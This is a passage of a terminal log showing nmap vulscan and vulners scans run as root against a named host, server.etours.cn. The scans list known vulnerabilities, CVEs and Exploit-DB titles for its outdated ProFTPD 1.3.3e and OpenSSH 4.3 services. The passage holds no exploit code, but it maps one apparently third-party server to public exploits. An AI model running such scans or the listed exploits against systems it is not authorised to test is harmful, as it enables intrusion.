  1689. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  1690. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  1691. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  1692. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  1693. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  1694. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  1695. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  1696. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  1697. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  1698. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  1699. |
  1700. | OpenVAS (Nessus) - http://www.openvas.org:
  1701. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1702. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  1703. |
  1704. | SecurityTracker - https://www.securitytracker.com:
  1705. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  1706. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  1707. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  1708. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  1709. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  1710. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  1711. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  1712. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  1713. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  1714. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  1715. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  1716. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  1717. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  1718. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  1719. |
  1720. | OSVDB - http://www.osvdb.org:
  1721. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  1722. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  1723. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  1724. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  1725. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  1726. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  1727. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  1728. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  1729. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  1730. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  1731. | [57310] ProFTPD Multiple Unspecified Overflows
  1732. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  1733. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  1734. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  1735. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  1736. | [57305] ProFTPD src/main.c Unspecified Overflow
  1737. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  1738. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  1739. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  1740. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  1741. | [51849] ProFTPD Character Encoding SQL Injection
  1742. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  1743. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  1744. | [48411] ProFTPD FTP Command Truncation CSRF
  1745. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  1746. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  1747. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  1748. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  1749. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  1750. | [23063] ProFTPD mod_radius Password Overflow DoS
  1751. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  1752. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  1753. | [18270] ProFTPD ftpshut Shutdown Message Format String
  1754. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  1755. | [10769] ProFTPD File Transfer Newline Character Overflow
  1756. | [10768] ProFTPD STAT Command Remote DoS
  1757. | [10758] ProFTPD Login Timing Account Name Enumeration
  1758. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  1759. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  1760. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  1761. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  1762. | [7165] ProFTPD USER Command Memory Leak DoS
  1763. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  1764. | [5705] ProFTPD Malformed cwd Command Format String
  1765. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  1766. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  1767. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  1768. |_
  1769. Service Info: OS: Unix
  1770.  
  1771. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1772. Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
  1773.  
  1774.  
  1775. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p22 184.154.192.250
  1776. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:28 CST
  1777. Nmap scan report for server.etours.cn (184.154.192.250)
  1778. Host is up (0.037s latency).
  1779.  
  1780. PORT STATE SERVICE VERSION
  1781. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1782. | vulscan: VulDB - https://vuldb.com:
  1783. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  1784. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  1785. | [43307] OpenSSH 4.0 unknown vulnerability
  1786. | [41835] OpenSSH up to 4.8 unknown vulnerability
  1787. | [38743] OpenSSH up to 4.6 unknown vulnerability
  1788. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  1789. | [32699] OpenBSD OpenSSH 4.1 denial of service
  1790. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  1791. |
  1792. | MITRE CVE - https://cve.mitre.org:
  1793. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  1794. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  1795. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  1796. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  1797. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  1798. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  1799. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  1800. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  1801. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  1802. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  1803. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  1804. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  1805. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  1806. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  1807. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  1808. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  1809. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  1810. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  1811. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  1812. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  1813. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  1814. |
  1815. | SecurityFocus - https://www.securityfocus.com/bid/:
  1816. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1817. |
  1818. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1819. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  1820. |
  1821. | Exploit-DB - https://www.exploit-db.com:
  1822. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  1823. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1824. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  1825. |
  1826. | OpenVAS (Nessus) - http://www.openvas.org:
  1827. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  1828. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  1829. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  1830. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  1831. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  1832. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  1833. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  1834. | [861813] Fedora Update for openssh FEDORA-2010-5429
  1835. | [861319] Fedora Update for openssh FEDORA-2007-395
  1836. | [861170] Fedora Update for openssh FEDORA-2007-394
  1837. | [861012] Fedora Update for openssh FEDORA-2007-715
  1838. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  1839. | [840300] Ubuntu Update for openssh update USN-612-5
  1840. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  1841. | [840268] Ubuntu Update for openssh update USN-612-7
  1842. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  1843. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  1844. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  1845. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  1846. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  1847. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  1848. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  1849. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  1850. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  1851. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  1852. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  1853. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  1854. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  1855. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  1856. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  1857. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  1858. | [65987] SLES10: Security update for OpenSSH
  1859. | [65819] SLES10: Security update for OpenSSH
  1860. | [65514] SLES9: Security update for OpenSSH
  1861. | [65513] SLES9: Security update for OpenSSH
  1862. | [65334] SLES9: Security update for OpenSSH
  1863. | [65248] SLES9: Security update for OpenSSH
  1864. | [65218] SLES9: Security update for OpenSSH
  1865. | [65169] SLES9: Security update for openssh,openssh-askpass
  1866. | [65126] SLES9: Security update for OpenSSH
  1867. | [65019] SLES9: Security update for OpenSSH
  1868. | [65015] SLES9: Security update for OpenSSH
  1869. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  1870. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  1871. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  1872. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  1873. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  1874. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  1875. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  1876. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  1877. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  1878. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  1879. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  1880. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  1881. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  1882. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  1883. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  1884. | [57470] FreeBSD Ports: openssh
  1885. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  1886. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  1887. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  1888. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  1889. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  1890. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  1891. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  1892. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  1893. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  1894. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  1895. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  1896. | [10883] OpenSSH Channel Code Off by 1
  1897. | [10823] OpenSSH UseLogin Environment Variables
  1898. |
  1899. | SecurityTracker - https://www.securitytracker.com:
  1900. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  1901. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  1902. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  1903. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  1904. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  1905. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  1906. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  1907. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  1908. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  1909. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  1910. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  1911. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  1912. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  1913. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  1914. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  1915. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  1916. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  1917. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  1918. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  1919. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  1920. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  1921. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  1922. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  1923. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  1924. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  1925. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  1926. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  1927. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  1928. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  1929. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticate to the System
  1930. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  1931. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
  1932. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  1933. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  1934. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  1935. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  1936. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  1937. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  1938. |
  1939. | OSVDB - http://www.osvdb.org:
  1940. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  1941. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  1942. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  1943. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  1944. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  1945. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  1946. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  1947. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  1948. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  1949. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  1950. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  1951. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  1952. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  1953. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  1954. | [56921] OpenSSH Unspecified Remote Compromise
  1955. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  1956. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  1957. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  1958. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  1959. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  1960. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  1961. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  1962. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  1963. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  1964. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  1965. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  1966. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  1967. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  1968. | [34601] OPIE w/ OpenSSH Account Enumeration
  1969. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  1970. | [32721] OpenSSH Username Password Complexity Account Enumeration
  1971. | [30232] OpenSSH Privilege Separation Monitor Weakness
  1972. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  1973. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  1974. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  1975. | [29152] OpenSSH Identical Block Packet DoS
  1976. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  1977. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  1978. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  1979. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  1980. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  1981. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  1982. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  1983. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  1984. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  1985. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  1986. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  1987. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  1988. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  1989. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  1990. | [6072] OpenSSH PAM Conversation Function Stack Modification
  1991. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  1992. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  1993. | [5408] OpenSSH echo simulation Information Disclosure
  1994. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  1995. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  1996. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  1997. | [3456] OpenSSH buffer_append_space() Heap Corruption
  1998. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  1999. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  2000. | [2112] OpenSSH Reverse DNS Lookup Bypass
  2001. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  2002. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  2003. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2004. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2005. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2006. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2007. | [642] OpenSSH Multiple Key Type ACL Bypass
  2008. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2009. | [341] OpenSSH UseLogin Local Privilege Escalation
  2010. |_
  2011.  
  2012. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2013. Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds
  2014.  
  2015.  
  2016. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p21 184.154.192.250
  2017. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:29 CST
  2018. Nmap scan report for server.etours.cn (184.154.192.250)
  2019. Host is up (0.14s latency).
  2020.  
  2021. PORT STATE SERVICE VERSION
  2022. 21/tcp open ftp ProFTPD 1.3.3e
  2023. | vulscan: VulDB - https://vuldb.com:
  2024. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  2025. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  2026. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c sql_prepare_where memory corruption
  2027. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  2028. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  2029. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  2030. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  2031. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  2032. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  2033. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  2034. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  2035. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  2036. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  2037. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  2038. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  2039. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  2040. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  2041. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
